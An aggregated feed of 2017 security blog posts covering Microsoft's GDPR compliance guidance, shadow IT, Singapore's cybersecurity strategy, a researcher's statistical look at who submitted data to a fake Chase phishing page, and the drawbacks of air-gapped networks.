Microsoft wears many hats under the GDPR: we offer consumer services for which we are a controller, we offer enterprise online services for which we are a processor, and setting aside our role as a technology company, we are an international company with a global employee base. This means that we are going through the same journey as your organization and are innovating to make GDPR compliance simpler for our customers by May 2018. As stated in a recent blog post by Brendon Lynch, Chief Privacy Officer at Microsoft, “To simplify your path to compliance, Microsoft is committing to be GDPR compliant across our cloud services when enforcement begins on May 25, 2018. We have also committed to share our experience complying with complex regulations, to help you craft the best path forward for your organization to meet the privacy requirements of the GDPR.”
You can read and observe the Microsoft journey to GDPR compliance and recommendations via our website and the Get GDPR compliant with the Microsoft Cloud blog. On the website, you will find a whitepaper which describes how Microsoft enterprise products and cloud services can help you to be ready for GDPR.
From my discussions with customers and partners, I can attest that many are keenly aware of GDPR requirements. However, awareness and readiness currently span a large divide. About one third have not yet begun the journey, another third is just beginning the process, and the final third are actively working to map GDPR requirements to their current processes and technology stack.
GDPR is not only the responsibility of the Chief Information Security Officer or Data Privacy Officer, but of the entire C-suite. It is not just about the application of technology, but it is important to consider the processes involved and align them to the new regulation. Last, but not least, it is also a topic that every employee should be aware of – from the executive level to operations. It is of paramount importance to give proper awareness and training across the company, emphasizing the importance of GDPR, its impact on the company operations and the consequences in the case of not complying with GDPR requirements. Therefore, becoming GDPR complaint includes the full scope of alignment of people, processes and technology.
What can I do today?
We recommend you begin your journey to GDPR compliance by focusing on four key steps (see Figure 1 below):
- Discover—identify what personal data you have and where it resides. This is fundamental to any good risk management practice, and is critical with the GDPR as one can only protect and manage data, as required by the GDPR, when the data is identified.
- Manage— execute on data subject requests, govern how personal data is used and accessed. Make sure that data is only used for the purposes it was intended for and accessible only to those with a need to access it.
- Protect—establish security controls to prevent, detect, and respond to vulnerabilities and data breaches. By properly securing your data across its lifecycle, you will reduce the risk of a breach occurring. Knowing when and if a breach occurs, can help you keep the data protection authority informed.
- Report—report data breaches, and keep required documentation. Proving you are governing data in the right way and successfully handling data subject requests is the core of compliance.
Figure 1: Four steps to GDPR compliance
The Beginning your GDPR Journey whitepaper provides more details on the steps and the technologies available today to help you.
What is the role of my cloud provider?
This is a common question I hear from CISOs looking across their complex environments, as they try to understand what role their cloud provider plays in addressing the requirements of the GDPR. The GDPR requires that controllers only use processors that have committed to comply with the GDPR and to support compliance efforts of controllers. Microsoft is the first major cloud service provider to make this commitment. That means, Microsoft will meet the stringent security requirements of GDPR.
Fundamentally, GDPR is also about a shared responsibility and trust. It requires a cloud service provider with a principled approach to privacy, security, compliance and transparency such as Microsoft. Trust can be viewed from many different angles, including how the provider is securing its own, and their customer’s, infrastructure to manage cybersecurity risks. How is data protected? What mechanism and principles are driving the approaches and practices in this very sensitive area?
Microsoft invests $1 billion per year to protect, detect and respond to security incidents, within the company, and on behalf of customers and the millions of victims of cybercrime around the globe. In November 2015 we announced the Microsoft Cyber Defense Operations Center (CDOC). This facility brings together security experts from across the company to help protect, detect and respond to cyber threats in real-time. CDOC dedicated teams operate 24×7, and the center has direct access to thousands of security professionals, data analysts and scientists, engineers, developers, program managers, and operations specialists throughout the Microsoft global network. This ensures rapid detection, response and resolution to security threats.
Figure 2: Cyber Defense Operations Center (CDOC)
Microsoft openly shares how we protect our own and our customers’ infrastructures. Read more about best practices used in the Cyber Defense Operations Center. The CDOC also leverages the power of the cloud through the Microsoft Intelligent Security Graph (ISG).
Every second of every day, we add hundreds of gigabytes worth of telemetry to the Security Graph. This anonymized data is coming from:
- hundreds of global cloud services, both consumer and commercial
- data about cyber threats faced by the +1 billion PCs we update via Windows Update every month
- external data points we collect through extensive research, partnership with industry and law enforcement through the Microsoft Digital Crimes Unit
To give you a visual of what that means, we add to the Security Graph with data from the 300 billion monthly authentications across our consumer and enterprise services, as well as the 200 billion e-mails that are analyzed each month for malware and malicious websites.
Imagine all of this data coming together in one place. Think of how the insight that provides can help to anticipate and defeat attacks, protecting your organization. As you can see in Figure 3, we analyze feedback, malware, spam, authentications, and attacks. For example, data from millions of Xbox Live devices show how they are being attacked, and we learn how to apply that to better protect our customers. Much is incorporated through machine learning and data scientist analysis to better understand the newest techniques of cyber attacks.
In addition to the CDOC, the Digital Crimes Unit and the Intelligent Security Graph, Microsoft also created a dedicated team of enterprise cybersecurity professionals to help move you securely to the Cloud and protect your data. These are just a few examples of the continuous investments Microsoft makes in cybersecurity, that are crucial to create products and services that support your compliance with the GDPR.
How can technology help me with compliance?
Fortunately, there are many technology solutions to help with GDPR compliance. Two of my favorites are Microsoft Azure Information Protection (AIP) and Advanced Threat Protection (ATP) in Exchange Online. AIP ensures your data is identifiable and secure, a key requirement of GDPR – regardless of where it’s stored or how it’s shared. With AIP you can instantly get to work on Steps 1 & 2 mentioned above, to classify, label and protect new or existing data, to share it securely with people within or outside of your organization, to track usage, and even to revoke access remotely. It is intuitive, easy to use and a powerful solution that also includes rich logging and reporting to monitor the distribution of data, and options to manage and control your encryption keys.
When you are ready for step 3 in your GDPR compliance journey, Advanced Threat Protection (ATP) addresses the core requirement of GDPR to protect the personal data of individuals against security threats. Office 365 includes features that safeguard data and identify when a data breach occurs. One such feature is Advanced Threat Protection (ATP) in Exchange Online Protection that helps protect email against new, sophisticated malware attacks in real time. ATP also provides a way to create policies that prevent users from accessing malicious email attachments or malicious websites linked through emails. For example, with the Safe Attachments feature you can prevent malicious attachments from impacting your messaging environment, even if their signatures are not known. All suspicious content goes through a real-time behavioral malware analysis that uses machine learning techniques to evaluate the content for suspicious activity. Unsafe attachments are sandboxed in a detonation chamber before being sent to recipients.
A recent issue of the Economist explained, “How to manage the computer security threat.” Their top recommendation was that both government and product regulations must lead the way. Without a doubt GDPR needs to be seriously addressed as a top priority on the agenda of every CISO now and beyond May 2018. This is a continuous commitment to security and privacy. By becoming more regulated through GDPR, providing a framework to better protect personal data, and giving tools to implement security controls for protecting, detecting and responding to threats, we will fight our best fight against cyber crime. Microsoft stands ready to work with CISOs to raise awareness, empower and ensure access to the resources available now and in the future.
Learn more about Microsoft GDPR and general security with these helpful resources:
- GDPR resources
- GDPR “Beginning your GDPR Journey” whitepaper
- Executive Support: Learn more about the Enterprise Cybersecurity Group, or contact your local Microsoft representative.
- Blogs: Microsoft Secure Blog and Microsoft On the Issues
- Learn more about the Microsoft Enterprise Cloud
- Read the Microsoft Security Intelligence Report
- Follow us on Twitter: @MSFTSecurity
About the author:
Daniel Grabski is a 20-year veteran of the IT industry, currently serving as an Executive Security Advisor for Europe, Middle East and Africa time zone in the Enterprise Cybersecurity Group at Microsoft. In this role, he focuses on enterprise, partners, public sector customers and critical security stakeholders. Daniel delivers strategic security expertise and advice around cybersecurity solutions and services which are needed to build and maintain secure and resilient ICT infrastructure.
from Microsoft Secure Blog Staff
Monday, May 8, 2017
Over 80 percent of employees admit to using non-approved SaaS applications in their jobs, and for the most part they have well-intentioned reasons for adopting them. Many report wanting to use software they are familiar with, that is cheaper, quicker to deploy, and better meets their needs than the IT-approved equivalent. This isn’t just about personal preference. It allows employees to skip the learning curve of new software and enables the business to move more quickly.
Empowering employees find creative solutions to business problems and enabling easy access to tools they need are key to driving innovation and productivity.
Flexibility to use preferred tools can also help attract the next generation of talent. Younger workers have grown up using the apps and devices they want to get things done in the way that works for them. Nearly 50% prefer tools like chat and messaging, and they are twice a likely as boomers to prefer meeting online versus in person. While the urge to block Shadow IT is understandable, it may signal to new employees that your company culture isn’t open to the new and innovative solutions that often characterize successful businesses.
IT should look for solutions that give employees the freedom to choose the apps they want, while still ensuring the security and compliance your organization demands. One of those solutions is to use a Cloud Access Security Broker.
Empower your workforce with a Cloud Access Security Broker (CASB)
CASB solutions give you a detailed picture of the cloud apps your employees use and help you to monitor and manage them effectively.
A good CASB solution discovers which cloud apps are in use and brings them under the hood into a single interface. Each app is then rated for risk based on industry standards and best practices, so you can easily scan and set policies for how users interact with each app. A good CASB solution can also help protect those apps from advanced security threats.
With better visibility, control, and protection over your Shadow IT, you can help empower greater productivity and manage your security risk. Curious to learn more? Check out our new e-book: Bring Shadow IT into the Light.
from Microsoft Secure Blog Staff
Saturday, May 6, 2017
I published the following diary on isc.sans.org: “The story of the CFO and CEO…“.
I read an interesting article in a Belgian IT magazine. Every year, they organise a big survey to collect feelings from people working in the IT field (not only security). It is very broad and covers their salary, work environments, expectations, etc. For infosec people, one of the key points was that people wanted to attend more trainings and conferences… [Read more]
Friday, May 5, 2017
I published the following diary on isc.sans.org: “HTTP Headers… the Achilles’ heel of many applications“.
When browsing a target web application, a pentester is looking for all “entry” or “injection” points present in the pages. Everybody knows that a static website with pure HTML code is less juicy compared to a website with many forms and gadgets where visitors may interact with it. Classic vulnerabilities (XSS, SQLi) are based on the user input that is abused to send unexpected data to the server… [Read more]
[The post [SANS ISC] HTTP Headers… the Achilles’ heel of many applications has been first published on /dev/random]
Wednesday, May 3, 2017
In 2005, just over a decade ago, the majority of large internet user populations, certainly as a percentage of their total national population, were still to be found in North America and Europe. In 2025, less than a decade from now, many of the largest internet user populations will be in Asia. Asia will be a fulcrum of cyberspace and it will also be, inevitably, a fulcrum of both cybercrime and cybersecurity. As such, cybersecurity policy decisions being made today in Asia will significantly shape cyberspace in 2025 and beyond. Given the interconnected nature of cyberspace, their impact will be global.
While many analysts focus on Asia’s large political and economic players, such as Tokyo and Beijing, I will take a look at Singapore, whose smaller size has allowed it to be agile and power ahead in terms of online innovation. It is clear that the government realized that technology is central to both the country’s current economic success and its future prospects. Not only has it strived to make Singapore a hub for industries highly reliant on technology, such as financial services, it has focused its investments to ensure the country can become a true “Smart Nation”. That has meant being bold in adopting new technologies and, on occasion, facilitating experimentation, for example through the recently outlined a “big data sandbox” initiative.
Moreover, Singapore has also realized that it can only be successful in this space if it can adopt technology securely. Its approach, which is to give clear guidance to key parts of the economy and to cooperate closely with the private sector to help create, refine and enact that guidance with an eye to ensuring future innovation, is a worthwhile example for other Asian governments. Its early push in ensuring key industry sectors can move to the cloud securely through the adoption of the Multi-Tier Cloud Security standard, has been followed by complementary initiatives, such as the Cloud Implementation Guide, developed by the Association of Banks in Singapore (ABS). Central to the success of both of the documents has been a close partnership with those they intended to guide, i.e. both cloud providers and those adopting new technologies. This mirrors the positive model of public-private engagement that underpinned the successful NIST Cybersecurity Framework in the United States.
More recently, the Singaporean Cybersecurity Agency (CSA) has made cybersecurity even more of a priority for the country. The Cybersecurity Strategy, launched in October 2016, aims to build a resilient and trusted cyber environment by focusing on four pillars: i) Building a Resilient Infrastructure; ii) Creating a Safe Cyberspace; iii) Developing a Vibrant Cybersecurity Ecosystem; and iv) Strengthening International Partnerships. First outcomes can already be seen, with the revised Cybercrime Act adopted in April.
Moreover, the government has already begun consultations on its Cybersecurity Act, which we expect to be introduced by the end of the year. It will be interesting to observe whether Singapore follows models that have been put forward by the above-mentioned NIST Cybersecurity Framework, or takes an approach closer to that put forward by the European Union with the Network and Information Security Directive. On the other hand, it could put forward its own model. After all, frameworks for protecting critical infrastructure online are evolving. Countries are debating the benefits of regulatory vs. voluntary approaches, struggling to balance information sharing and incident reporting, and managing the role of regulators in an area that cuts across typical boundaries between industry sectors.
Singapore is not, however, only looking inwards. It is making an active contribution to regional cybersecurity, having launched an ASEAN Cyber Capacity Program (ACCP). As well as capacity-building activities, developing technical skills, and incident response capabilities, the ACCP will support discussion and consultancy work in areas such as the creation of national cybersecurity agencies, cybersecurity strategies, and even cybersecurity legislation. This initiative highlights an important understanding: that in an interconnected world, an individual, organisation or state is only as safe in cyberspace as its weakest link.
Although I remain concerned that Singapore’s approach to network separation could create problems for government, business and citizens, what distinguishes Singapore’s approach, overall, is its determination to tackle cybersecurity without cutting off its connections to the region and the world. Perhaps for an island nation that depends upon commerce the logic of putting up barriers is particularly inimical, but it nonetheless demonstrates that it can be done: governments can build cybersecurity without harming openness and innovation. Looking at Singapore, I would hope that other governments, not just in Asia but around the world, can see that infrastructure, businesses and citizens can all be protected without the loss of the interconnectedness and opportunities of cyberspace.
from Paul Nicholas
A study was just released by cyber security firm Neustar Security that confirms the fear of many IT professionals and executives in big and small organizations alike. DDoS attacks are rapidly increasing in number and they are becoming more and more powerful.
The firm’s head of research and development fears that enough precautions have not been taken to prevent DDoS by many companies. His company is trying its best to spread awareness of the DDoS by releasing statistical data about how damaging these attacks can be. If your organization isn’t prepared, you’ll face massive losses.
The post A DDoS tsunami is coming to cost companies in millions appeared first on Cyber Security Portal.
from Gilbertine Onfroi
Tuesday, May 2, 2017
Today, while hunting, I found a malicious HTML page in my spam trap. The page was a fake JP Morgan Chase bank. Nothing fancy. When I found such material, I usually search for “POST” HTTP requests to collect URLs and visit the websites that receive the victim’s data. As usual, the website was not properly protected and all files were readable. This one looked interesting:
The first question was: are those data relevant. Probably not… Why?
Today, many attackers protect their malicious website via an .htaccess file to restrict access to their victims only. In this case, the Chase bank being based in the US, we could expect that most of the visitors’ IP addresses to be geolocalized there but it was not the case this time. I downloaded the data file that contained 503 records. Indeed, most of them contained empty or irrelevant information. So I decided to have a look at the IP addresses. Who’s visiting the phishing site? Let’s generate some statistics!
$ grep ^ip: data.txt |cut -d ' ' -f 2 | sort -u >victims.csv $ wc -l victims.csv 150
With Splunk, we can easily display them on a fancy map:
| inputlookup victims.csv | iplocation IP \ | inputlookup victims.csv | iplocation IP \ | stats count by IP, lat, lon, City, Country, Region
Here is the top-5 of countries which visited the phishing page or, more precisely, which submitted a POST request:
Some IP addresses visited multiple times the website:
A reverse lookup on the IP addresses revealed some interesting information:
- The Google App Engine was the top visitor
- Many VPS providers visited the page, probably owned by researchers (OVH, Amazon EC2)
- Service protecting against phishing sites visited the page (ex: phishtank.com, phishmongers.com, isitphishing.org)
- Many Tor exit-nodes
- Some online URL scanners (urlscan.io)
- Some CERTS (CIRCL)
Two nice names were found:
No real victim left his/her data on the fake website. Some records contained data but fake ones (although probably entered manually). All the traffic was generated by crawlers, bot and security tools…
Monday, May 1, 2017
In some of my recent discussions with policy-makers, network separation, i.e. the physical isolation of sensitive networks from the Internet, has been floated as an essential cybersecurity tool. Why? It promises the holy grail of security, i.e. 100% protection, because cyberattacks can’t cross the “air gap” to reach their target.
In my experience, however, network separation has its place in the governments’ cybersecurity toolkit but it also suffers from significant drawbacks. These include: costs of implementation and maintenance; diminished productivity; and, perhaps counterintuitively, degradation in some key aspects of security. Overall, network separation is out of step with a world where systems’ interconnectivity is underpinning innovation driven by cloud computing and the Internet of Things (IoT). I’m going to use this blog to look a little more closely at these issues.
Network separation is an established and recognized security practice in critical sectors, e.g. classified military networks or nuclear power plants. The potential consequences of these systems being compromised are sufficiently bad to justify any downsides that network separation might introduce. However, as governments consider implementing network separation more broadly, that cost/benefit calculation must change.
Looking at costs alone, creating separate networks means increased expenditure of limited resources and reduced economies of scale. An “air gap” demands creating a whole new network with standalone servers, routers, switches, management tools, etc. That network needs to be built to deliver the foreseeable peak demand, which might only occur every now and then. This largely unused capacity is effectively wasted, whereas a non-separated network could simply use temporary cloud resources to “scale up” when needed. Costs increase further because software maintenance cannot be done by a remote centralized hub, whilst physical maintenance is more time consuming.
Network separation can also harm efficiency, productivity and usability. An “air gap” creates barriers to the outside world, which most government workers need to best serve their constituencies. Having to turn attention and move information between different devices, some separated and some not, would be time consuming at best and confusing at worst. And many government services and systems that are meant to interact directly with citizens are likely to be slowed and made more cumbersome by separation protocols. The benefits of smart cities and smart nations will be significantly diminished if governments forsake cloud and IoT benefits in the name of network separation.
Finally, even network separation’s security benefits are not foolproof. For one thing, being disconnected from threats frequently means being disconnected from cybersecurity innovation, let alone mundane security tools such as patches. Moreover, the assumption of being safe on the other side of an “air gap” can mean staff and management take essential security basics for granted. Indeed, a poor cybersecurity culture within any organization means social engineering or human error can give malicious actors a way into a system, e.g. as employees circumvent cumbersome requirements by relying on their private (and often insecure) email.
Furthermore, the “air gap” itself can be circumvented. Just one connection with the outside world creates a single point of failure for malicious actors to exploit and even with no direct connection there are ways “in”. As Stuxnet showed, removable media such as USB drives can insert malware into physically separated hardware, whilst some forms of hacking are able to “jump” the “air-gap”, e.g. USBee (a “software-only method for short-range data exfiltration using electromagnetic emissions from a USB dongle”) and AirHopper (turns a computer’s video card into an FM transmitter to collect data from “air-gapped” devices).
For governments concerned about the growing scale, frequency, sophistication and impact of cyberattacks there can be legitimate reasons for adopting network separation. In limited sets of circumstances, e.g. protecting classified networks, it can be part of an appropriate, risk-management based cybersecurity response. That being said, it is essential for governments to understand the tradeoffs in cost, usability, and effectiveness that the approach introduces. Network separation is not and cannot be the right or the only answer to all of their cybersecurity concerns.
from Paul Nicholas